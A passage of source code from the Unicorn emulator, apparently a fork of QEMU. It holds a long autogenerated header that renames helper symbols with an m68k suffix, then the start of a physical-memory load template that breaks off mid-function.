helper_atomic_xor_fetchq_be_mmu_m68k #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_m68k #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_m68k #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_m68k #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_m68k #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_m68k #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_m68k #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_m68k #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_m68k #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_m68k #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_m68k #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_m68k #define helper_atomic_xchgb helper_atomic_xchgb_m68k #define helper_atomic_fetch_addb helper_atomic_fetch_addb_m68k #define helper_atomic_fetch_andb helper_atomic_fetch_andb_m68k #define helper_atomic_fetch_orb helper_atomic_fetch_orb_m68k #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_m68k #define helper_atomic_add_fetchb helper_atomic_add_fetchb_m68k #define helper_atomic_and_fetchb helper_atomic_and_fetchb_m68k #define helper_atomic_or_fetchb helper_atomic_or_fetchb_m68k #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_m68k #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_m68k #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_m68k #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_m68k #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_m68k #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_m68k #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_m68k #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_m68k #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_m68k #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_m68k #define helper_atomic_xchgw_le helper_atomic_xchgw_le_m68k #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_m68k #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_m68k #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_m68k #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_m68k #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_m68k #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_m68k #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_m68k #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_m68k #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_m68k #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_m68k #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_m68k #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_m68k #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_m68k #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_m68k #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_m68k #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_m68k #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_m68k #define helper_atomic_xchgw_be helper_atomic_xchgw_be_m68k #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_m68k #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_m68k #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_m68k #define 
helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_m68k #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_m68k #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_m68k #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_m68k #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_m68k #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_m68k #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_m68k #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_m68k #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_m68k #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_m68k #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_m68k #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_m68k #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_m68k #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_m68k #define helper_atomic_xchgl_le helper_atomic_xchgl_le_m68k #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_m68k #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_m68k #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_m68k #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_m68k #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_m68k #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_m68k #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_m68k #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_m68k #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_m68k #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_m68k #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_m68k #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_m68k #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_m68k #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_m68k #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_m68k #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_m68k #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_m68k #define helper_atomic_xchgl_be helper_atomic_xchgl_be_m68k #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_m68k #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_m68k #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_m68k #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_m68k #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_m68k #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_m68k #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_m68k #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_m68k #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_m68k #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_m68k #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_m68k #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_m68k #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_m68k #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_m68k #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_m68k #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_m68k #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_m68k #define helper_atomic_xchgq_le helper_atomic_xchgq_le_m68k #define helper_atomic_fetch_addq_le 
helper_atomic_fetch_addq_le_m68k #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_m68k #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_m68k #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_m68k #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_m68k #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_m68k #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_m68k #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_m68k #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_m68k #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_m68k #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_m68k #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_m68k #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_m68k #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_m68k #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_m68k #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_m68k #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_m68k #define helper_atomic_xchgq_be helper_atomic_xchgq_be_m68k #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_m68k #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_m68k #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_m68k #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_m68k #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_m68k #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_m68k #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_m68k #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_m68k #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_m68k #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_m68k #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_m68k #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_m68k #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_m68k #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_m68k #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_m68k #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_m68k #define cpu_ldub_code cpu_ldub_code_m68k #define cpu_lduw_code cpu_lduw_code_m68k #define cpu_ldl_code cpu_ldl_code_m68k #define cpu_ldq_code cpu_ldq_code_m68k #define helper_div_i32 helper_div_i32_m68k #define helper_rem_i32 helper_rem_i32_m68k #define helper_divu_i32 helper_divu_i32_m68k #define helper_remu_i32 helper_remu_i32_m68k #define helper_shl_i64 helper_shl_i64_m68k #define helper_shr_i64 helper_shr_i64_m68k #define helper_sar_i64 helper_sar_i64_m68k #define helper_div_i64 helper_div_i64_m68k #define helper_rem_i64 helper_rem_i64_m68k #define helper_divu_i64 helper_divu_i64_m68k #define helper_remu_i64 helper_remu_i64_m68k #define helper_muluh_i64 helper_muluh_i64_m68k #define helper_mulsh_i64 helper_mulsh_i64_m68k #define helper_clz_i32 helper_clz_i32_m68k #define helper_ctz_i32 helper_ctz_i32_m68k #define helper_clz_i64 helper_clz_i64_m68k #define helper_ctz_i64 helper_ctz_i64_m68k #define helper_clrsb_i32 helper_clrsb_i32_m68k #define helper_clrsb_i64 helper_clrsb_i64_m68k #define helper_ctpop_i32 helper_ctpop_i32_m68k #define helper_ctpop_i64 helper_ctpop_i64_m68k #define helper_lookup_tb_ptr helper_lookup_tb_ptr_m68k #define helper_exit_atomic helper_exit_atomic_m68k #define helper_gvec_add8 
helper_gvec_add8_m68k #define helper_gvec_add16 helper_gvec_add16_m68k #define helper_gvec_add32 helper_gvec_add32_m68k #define helper_gvec_add64 helper_gvec_add64_m68k #define helper_gvec_adds8 helper_gvec_adds8_m68k #define helper_gvec_adds16 helper_gvec_adds16_m68k #define helper_gvec_adds32 helper_gvec_adds32_m68k #define helper_gvec_adds64 helper_gvec_adds64_m68k #define helper_gvec_sub8 helper_gvec_sub8_m68k #define helper_gvec_sub16 helper_gvec_sub16_m68k #define helper_gvec_sub32 helper_gvec_sub32_m68k #define helper_gvec_sub64 helper_gvec_sub64_m68k #define helper_gvec_subs8 helper_gvec_subs8_m68k #define helper_gvec_subs16 helper_gvec_subs16_m68k #define helper_gvec_subs32 helper_gvec_subs32_m68k #define helper_gvec_subs64 helper_gvec_subs64_m68k #define helper_gvec_mul8 helper_gvec_mul8_m68k #define helper_gvec_mul16 helper_gvec_mul16_m68k #define helper_gvec_mul32 helper_gvec_mul32_m68k #define helper_gvec_mul64 helper_gvec_mul64_m68k #define helper_gvec_muls8 helper_gvec_muls8_m68k #define helper_gvec_muls16 helper_gvec_muls16_m68k #define helper_gvec_muls32 helper_gvec_muls32_m68k #define helper_gvec_muls64 helper_gvec_muls64_m68k #define helper_gvec_neg8 helper_gvec_neg8_m68k #define helper_gvec_neg16 helper_gvec_neg16_m68k #define helper_gvec_neg32 helper_gvec_neg32_m68k #define helper_gvec_neg64 helper_gvec_neg64_m68k #define helper_gvec_abs8 helper_gvec_abs8_m68k #define helper_gvec_abs16 helper_gvec_abs16_m68k #define helper_gvec_abs32 helper_gvec_abs32_m68k #define helper_gvec_abs64 helper_gvec_abs64_m68k #define helper_gvec_mov helper_gvec_mov_m68k #define helper_gvec_dup64 helper_gvec_dup64_m68k #define helper_gvec_dup32 helper_gvec_dup32_m68k #define helper_gvec_dup16 helper_gvec_dup16_m68k #define helper_gvec_dup8 helper_gvec_dup8_m68k #define helper_gvec_not helper_gvec_not_m68k #define helper_gvec_and helper_gvec_and_m68k #define helper_gvec_or helper_gvec_or_m68k #define helper_gvec_xor helper_gvec_xor_m68k #define helper_gvec_andc helper_gvec_andc_m68k #define helper_gvec_orc helper_gvec_orc_m68k #define helper_gvec_nand helper_gvec_nand_m68k #define helper_gvec_nor helper_gvec_nor_m68k #define helper_gvec_eqv helper_gvec_eqv_m68k #define helper_gvec_ands helper_gvec_ands_m68k #define helper_gvec_xors helper_gvec_xors_m68k #define helper_gvec_ors helper_gvec_ors_m68k #define helper_gvec_shl8i helper_gvec_shl8i_m68k #define helper_gvec_shl16i helper_gvec_shl16i_m68k #define helper_gvec_shl32i helper_gvec_shl32i_m68k #define helper_gvec_shl64i helper_gvec_shl64i_m68k #define helper_gvec_shr8i helper_gvec_shr8i_m68k #define helper_gvec_shr16i helper_gvec_shr16i_m68k #define helper_gvec_shr32i helper_gvec_shr32i_m68k #define helper_gvec_shr64i helper_gvec_shr64i_m68k #define helper_gvec_sar8i helper_gvec_sar8i_m68k #define helper_gvec_sar16i helper_gvec_sar16i_m68k #define helper_gvec_sar32i helper_gvec_sar32i_m68k #define helper_gvec_sar64i helper_gvec_sar64i_m68k #define helper_gvec_shl8v helper_gvec_shl8v_m68k #define helper_gvec_shl16v helper_gvec_shl16v_m68k #define helper_gvec_shl32v helper_gvec_shl32v_m68k #define helper_gvec_shl64v helper_gvec_shl64v_m68k #define helper_gvec_shr8v helper_gvec_shr8v_m68k #define helper_gvec_shr16v helper_gvec_shr16v_m68k #define helper_gvec_shr32v helper_gvec_shr32v_m68k #define helper_gvec_shr64v helper_gvec_shr64v_m68k #define helper_gvec_sar8v helper_gvec_sar8v_m68k #define helper_gvec_sar16v helper_gvec_sar16v_m68k #define helper_gvec_sar32v helper_gvec_sar32v_m68k #define helper_gvec_sar64v helper_gvec_sar64v_m68k 
#define helper_gvec_eq8 helper_gvec_eq8_m68k #define helper_gvec_ne8 helper_gvec_ne8_m68k #define helper_gvec_lt8 helper_gvec_lt8_m68k #define helper_gvec_le8 helper_gvec_le8_m68k #define helper_gvec_ltu8 helper_gvec_ltu8_m68k #define helper_gvec_leu8 helper_gvec_leu8_m68k #define helper_gvec_eq16 helper_gvec_eq16_m68k #define helper_gvec_ne16 helper_gvec_ne16_m68k #define helper_gvec_lt16 helper_gvec_lt16_m68k #define helper_gvec_le16 helper_gvec_le16_m68k #define helper_gvec_ltu16 helper_gvec_ltu16_m68k #define helper_gvec_leu16 helper_gvec_leu16_m68k #define helper_gvec_eq32 helper_gvec_eq32_m68k #define helper_gvec_ne32 helper_gvec_ne32_m68k #define helper_gvec_lt32 helper_gvec_lt32_m68k #define helper_gvec_le32 helper_gvec_le32_m68k #define helper_gvec_ltu32 helper_gvec_ltu32_m68k #define helper_gvec_leu32 helper_gvec_leu32_m68k #define helper_gvec_eq64 helper_gvec_eq64_m68k #define helper_gvec_ne64 helper_gvec_ne64_m68k #define helper_gvec_lt64 helper_gvec_lt64_m68k #define helper_gvec_le64 helper_gvec_le64_m68k #define helper_gvec_ltu64 helper_gvec_ltu64_m68k #define helper_gvec_leu64 helper_gvec_leu64_m68k #define helper_gvec_ssadd8 helper_gvec_ssadd8_m68k #define helper_gvec_ssadd16 helper_gvec_ssadd16_m68k #define helper_gvec_ssadd32 helper_gvec_ssadd32_m68k #define helper_gvec_ssadd64 helper_gvec_ssadd64_m68k #define helper_gvec_sssub8 helper_gvec_sssub8_m68k #define helper_gvec_sssub16 helper_gvec_sssub16_m68k #define helper_gvec_sssub32 helper_gvec_sssub32_m68k #define helper_gvec_sssub64 helper_gvec_sssub64_m68k #define helper_gvec_usadd8 helper_gvec_usadd8_m68k #define helper_gvec_usadd16 helper_gvec_usadd16_m68k #define helper_gvec_usadd32 helper_gvec_usadd32_m68k #define helper_gvec_usadd64 helper_gvec_usadd64_m68k #define helper_gvec_ussub8 helper_gvec_ussub8_m68k #define helper_gvec_ussub16 helper_gvec_ussub16_m68k #define helper_gvec_ussub32 helper_gvec_ussub32_m68k #define helper_gvec_ussub64 helper_gvec_ussub64_m68k #define helper_gvec_smin8 helper_gvec_smin8_m68k #define helper_gvec_smin16 helper_gvec_smin16_m68k #define helper_gvec_smin32 helper_gvec_smin32_m68k #define helper_gvec_smin64 helper_gvec_smin64_m68k #define helper_gvec_smax8 helper_gvec_smax8_m68k #define helper_gvec_smax16 helper_gvec_smax16_m68k #define helper_gvec_smax32 helper_gvec_smax32_m68k #define helper_gvec_smax64 helper_gvec_smax64_m68k #define helper_gvec_umin8 helper_gvec_umin8_m68k #define helper_gvec_umin16 helper_gvec_umin16_m68k #define helper_gvec_umin32 helper_gvec_umin32_m68k #define helper_gvec_umin64 helper_gvec_umin64_m68k #define helper_gvec_umax8 helper_gvec_umax8_m68k #define helper_gvec_umax16 helper_gvec_umax16_m68k #define helper_gvec_umax32 helper_gvec_umax32_m68k #define helper_gvec_umax64 helper_gvec_umax64_m68k #define helper_gvec_bitsel helper_gvec_bitsel_m68k #define cpu_restore_state cpu_restore_state_m68k #define page_collection_lock page_collection_lock_m68k #define page_collection_unlock page_collection_unlock_m68k #define free_code_gen_buffer free_code_gen_buffer_m68k #define tcg_exec_init tcg_exec_init_m68k #define tb_cleanup tb_cleanup_m68k #define tb_flush tb_flush_m68k #define tb_phys_invalidate tb_phys_invalidate_m68k #define tb_gen_code tb_gen_code_m68k #define tb_exec_lock tb_exec_lock_m68k #define tb_exec_unlock tb_exec_unlock_m68k #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_m68k #define tb_invalidate_phys_range tb_invalidate_phys_range_m68k #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_m68k #define 
tb_check_watchpoint tb_check_watchpoint_m68k #define cpu_io_recompile cpu_io_recompile_m68k #define tb_flush_jmp_cache tb_flush_jmp_cache_m68k #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_m68k #define translator_loop_temp_check translator_loop_temp_check_m68k #define translator_loop translator_loop_m68k #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_m68k #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_m68k #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_m68k #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_m68k #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_m68k #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_m68k #define unassigned_mem_ops unassigned_mem_ops_m68k #define floatx80_infinity floatx80_infinity_m68k #define dup_const_func dup_const_func_m68k #define gen_helper_raise_exception gen_helper_raise_exception_m68k #define gen_helper_raise_interrupt gen_helper_raise_interrupt_m68k #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_m68k #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_m68k #define gen_helper_cpsr_read gen_helper_cpsr_read_m68k #define gen_helper_cpsr_write gen_helper_cpsr_write_m68k #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_m68k #define cpu_m68k_init cpu_m68k_init_m68k #define helper_reds32 helper_reds32_m68k #define helper_redf32 helper_redf32_m68k #define helper_exts32 helper_exts32_m68k #define helper_extf32 helper_extf32_m68k #define helper_extf64 helper_extf64_m68k #define helper_redf64 helper_redf64_m68k #define helper_firound helper_firound_m68k #define cpu_m68k_set_fpcr cpu_m68k_set_fpcr_m68k #define helper_fitrunc helper_fitrunc_m68k #define helper_set_fpcr helper_set_fpcr_m68k #define helper_fsround helper_fsround_m68k #define helper_fdround helper_fdround_m68k #define helper_fsqrt helper_fsqrt_m68k #define helper_fssqrt helper_fssqrt_m68k #define helper_fdsqrt helper_fdsqrt_m68k #define helper_fabs helper_fabs_m68k #define helper_fsabs helper_fsabs_m68k #define helper_fdabs helper_fdabs_m68k #define helper_fneg helper_fneg_m68k #define helper_fsneg helper_fsneg_m68k #define helper_fdneg helper_fdneg_m68k #define helper_fadd helper_fadd_m68k #define helper_fsadd helper_fsadd_m68k #define helper_fdadd helper_fdadd_m68k #define helper_fsub helper_fsub_m68k #define helper_fssub helper_fssub_m68k #define helper_fdsub helper_fdsub_m68k #define helper_fmul helper_fmul_m68k #define helper_fsmul helper_fsmul_m68k #define helper_fdmul helper_fdmul_m68k #define helper_fsglmul helper_fsglmul_m68k #define helper_fdiv helper_fdiv_m68k #define helper_fsdiv helper_fsdiv_m68k #define helper_fddiv helper_fddiv_m68k #define helper_fsgldiv helper_fsgldiv_m68k #define helper_fcmp helper_fcmp_m68k #define helper_ftst helper_ftst_m68k #define helper_fconst helper_fconst_m68k #define helper_fmovemx_st_predec helper_fmovemx_st_predec_m68k #define helper_fmovemx_st_postinc helper_fmovemx_st_postinc_m68k #define helper_fmovemx_ld_postinc helper_fmovemx_ld_postinc_m68k #define helper_fmovemd_st_predec helper_fmovemd_st_predec_m68k #define helper_fmovemd_st_postinc helper_fmovemd_st_postinc_m68k #define helper_fmovemd_ld_postinc helper_fmovemd_ld_postinc_m68k #define helper_fmod helper_fmod_m68k #define helper_frem helper_frem_m68k #define helper_fgetexp helper_fgetexp_m68k #define helper_fgetman helper_fgetman_m68k #define helper_fscale helper_fscale_m68k #define helper_flognp1 helper_flognp1_m68k #define helper_flogn helper_flogn_m68k #define helper_flog10 
helper_flog10_m68k #define helper_flog2 helper_flog2_m68k #define helper_fetox helper_fetox_m68k #define helper_ftwotox helper_ftwotox_m68k #define helper_ftentox helper_ftentox_m68k #define helper_ftan helper_ftan_m68k #define helper_fsin helper_fsin_m68k #define helper_fcos helper_fcos_m68k #define helper_fsincos helper_fsincos_m68k #define helper_fatan helper_fatan_m68k #define helper_fasin helper_fasin_m68k #define helper_facos helper_facos_m68k #define helper_fatanh helper_fatanh_m68k #define helper_ftanh helper_ftanh_m68k #define helper_fsinh helper_fsinh_m68k #define helper_fcosh helper_fcosh_m68k #define helper_cf_movec_to helper_cf_movec_to_m68k #define helper_m68k_movec_to helper_m68k_movec_to_m68k #define helper_m68k_movec_from helper_m68k_movec_from_m68k #define helper_set_macsr helper_set_macsr_m68k #define m68k_switch_sp m68k_switch_sp_m68k #define m68k_cpu_get_phys_page_debug m68k_cpu_get_phys_page_debug_m68k #define m68k_set_irq_level m68k_set_irq_level_m68k #define m68k_cpu_tlb_fill m68k_cpu_tlb_fill_m68k #define helper_bitrev helper_bitrev_m68k #define helper_ff1 helper_ff1_m68k #define helper_sats helper_sats_m68k #define cpu_m68k_set_sr cpu_m68k_set_sr_m68k #define helper_set_sr helper_set_sr_m68k #define helper_mac_move helper_mac_move_m68k #define helper_macmuls helper_macmuls_m68k #define helper_macmulu helper_macmulu_m68k #define helper_macmulf helper_macmulf_m68k #define helper_macsats helper_macsats_m68k #define helper_macsatu helper_macsatu_m68k #define helper_macsatf helper_macsatf_m68k #define helper_mac_set_flags helper_mac_set_flags_m68k #define cpu_m68k_get_ccr cpu_m68k_get_ccr_m68k #define helper_get_ccr helper_get_ccr_m68k #define cpu_m68k_set_ccr cpu_m68k_set_ccr_m68k #define helper_set_ccr helper_set_ccr_m68k #define helper_flush_flags helper_flush_flags_m68k #define helper_get_macf helper_get_macf_m68k #define helper_get_macs helper_get_macs_m68k #define helper_get_macu helper_get_macu_m68k #define helper_get_mac_extf helper_get_mac_extf_m68k #define helper_get_mac_exti helper_get_mac_exti_m68k #define helper_set_mac_extf helper_set_mac_extf_m68k #define helper_set_mac_exts helper_set_mac_exts_m68k #define helper_set_mac_extu helper_set_mac_extu_m68k #define helper_ptest helper_ptest_m68k #define helper_pflush helper_pflush_m68k #define helper_reset helper_reset_m68k #define m68k_cpu_do_interrupt m68k_cpu_do_interrupt_m68k #define m68k_cpu_transaction_failed m68k_cpu_transaction_failed_m68k #define m68k_cpu_exec_interrupt m68k_cpu_exec_interrupt_m68k #define helper_raise_exception helper_raise_exception_m68k #define helper_divuw helper_divuw_m68k #define helper_divsw helper_divsw_m68k #define helper_divul helper_divul_m68k #define helper_divsl helper_divsl_m68k #define helper_divull helper_divull_m68k #define helper_divsll helper_divsll_m68k #define helper_cas2w helper_cas2w_m68k #define helper_cas2l helper_cas2l_m68k #define helper_cas2l_parallel helper_cas2l_parallel_m68k #define helper_bfexts_mem helper_bfexts_mem_m68k #define helper_bfextu_mem helper_bfextu_mem_m68k #define helper_bfins_mem helper_bfins_mem_m68k #define helper_bfchg_mem helper_bfchg_mem_m68k #define helper_bfclr_mem helper_bfclr_mem_m68k #define helper_bfset_mem helper_bfset_mem_m68k #define helper_bfffo_reg helper_bfffo_reg_m68k #define helper_bfffo_mem helper_bfffo_mem_m68k #define helper_chk helper_chk_m68k #define helper_chk2 helper_chk2_m68k #define floatx80_mod floatx80_mod_m68k #define floatx80_getman floatx80_getman_m68k #define floatx80_getexp floatx80_getexp_m68k #define 
floatx80_scale floatx80_scale_m68k #define floatx80_move floatx80_move_m68k #define floatx80_lognp1 floatx80_lognp1_m68k #define floatx80_logn floatx80_logn_m68k #define floatx80_log10 floatx80_log10_m68k #define floatx80_log2 floatx80_log2_m68k #define floatx80_etox floatx80_etox_m68k #define floatx80_twotox floatx80_twotox_m68k #define floatx80_tentox floatx80_tentox_m68k #define floatx80_tan floatx80_tan_m68k #define floatx80_sin floatx80_sin_m68k #define floatx80_cos floatx80_cos_m68k #define floatx80_atan floatx80_atan_m68k #define floatx80_asin floatx80_asin_m68k #define floatx80_acos floatx80_acos_m68k #define floatx80_atanh floatx80_atanh_m68k #define floatx80_etoxm1 floatx80_etoxm1_m68k #define floatx80_tanh floatx80_tanh_m68k #define floatx80_sinh floatx80_sinh_m68k #define floatx80_cosh floatx80_cosh_m68k #define m68k_tcg_init m68k_tcg_init_m68k #define register_m68k_insns register_m68k_insns_m68k #define gen_intermediate_code gen_intermediate_code_m68k #define restore_state_to_opc restore_state_to_opc_m68k #endif
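The #endif above closes the autogenerated m68k rename header, which redirects every global QEMU symbol to an _m68k-suffixed name (via UNICORN_ARCH_POSTFIX) so that several target cores can be linked into one Unicorn library without symbol collisions. Below is a minimal, self-contained sketch of that renaming mechanism; the file name, dummy_symbol, and its body are hypothetical, not part of this tree:

/* prefix_demo.c -- sketch of the per-target symbol-suffixing scheme.
 * In Unicorn the #define lives in an autogenerated header (like the one
 * above) included before any QEMU code is compiled. */
#include <stdio.h>

#define dummy_symbol dummy_symbol_m68k  /* hypothetical rename entry */

int dummy_symbol(void)  /* the object file actually exports dummy_symbol_m68k */
{
    return 68000;
}

int main(void)
{
    /* Call sites are rewritten by the same macro, so they still match. */
    printf("dummy_symbol -> %d\n", dummy_symbol());
    return 0;
}

Because both the definition and every caller see the same #define, a second build compiled with a different suffix (say _mips, as in the header further below) can coexist in the same binary.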
unicorn-2.1.1/qemu/memory_ldst.inc.c

/*
 * Physical memory access templates
 *
 * Copyright (c) 2003 Fabrice Bellard
 * Copyright (c) 2015 Linaro, Inc.
 * Copyright (c) 2016 Red Hat, Inc.
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

/* warning: addr must be aligned */
static inline uint32_t glue(address_space_ldl_internal, SUFFIX)(struct uc_struct *uc,
    ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result,
    enum device_endian endian)
{
    uint8_t *ptr;
    uint64_t val;
    MemoryRegion *mr;
    hwaddr l = 4;
    hwaddr addr1;
    MemTxResult r;

    //RCU_READ_LOCK();
    mr = TRANSLATE(addr, &addr1, &l, false, attrs);
    if (l < 4 || !memory_access_is_direct(mr, false)) {
        /* I/O case */
        r = memory_region_dispatch_read(uc, mr, addr1, &val,
                                        MO_32 | devend_memop(endian), attrs);
    } else {
        /* RAM case */
        ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1);
        switch (endian) {
        case DEVICE_LITTLE_ENDIAN:
            val = ldl_le_p(ptr);
            break;
        case DEVICE_BIG_ENDIAN:
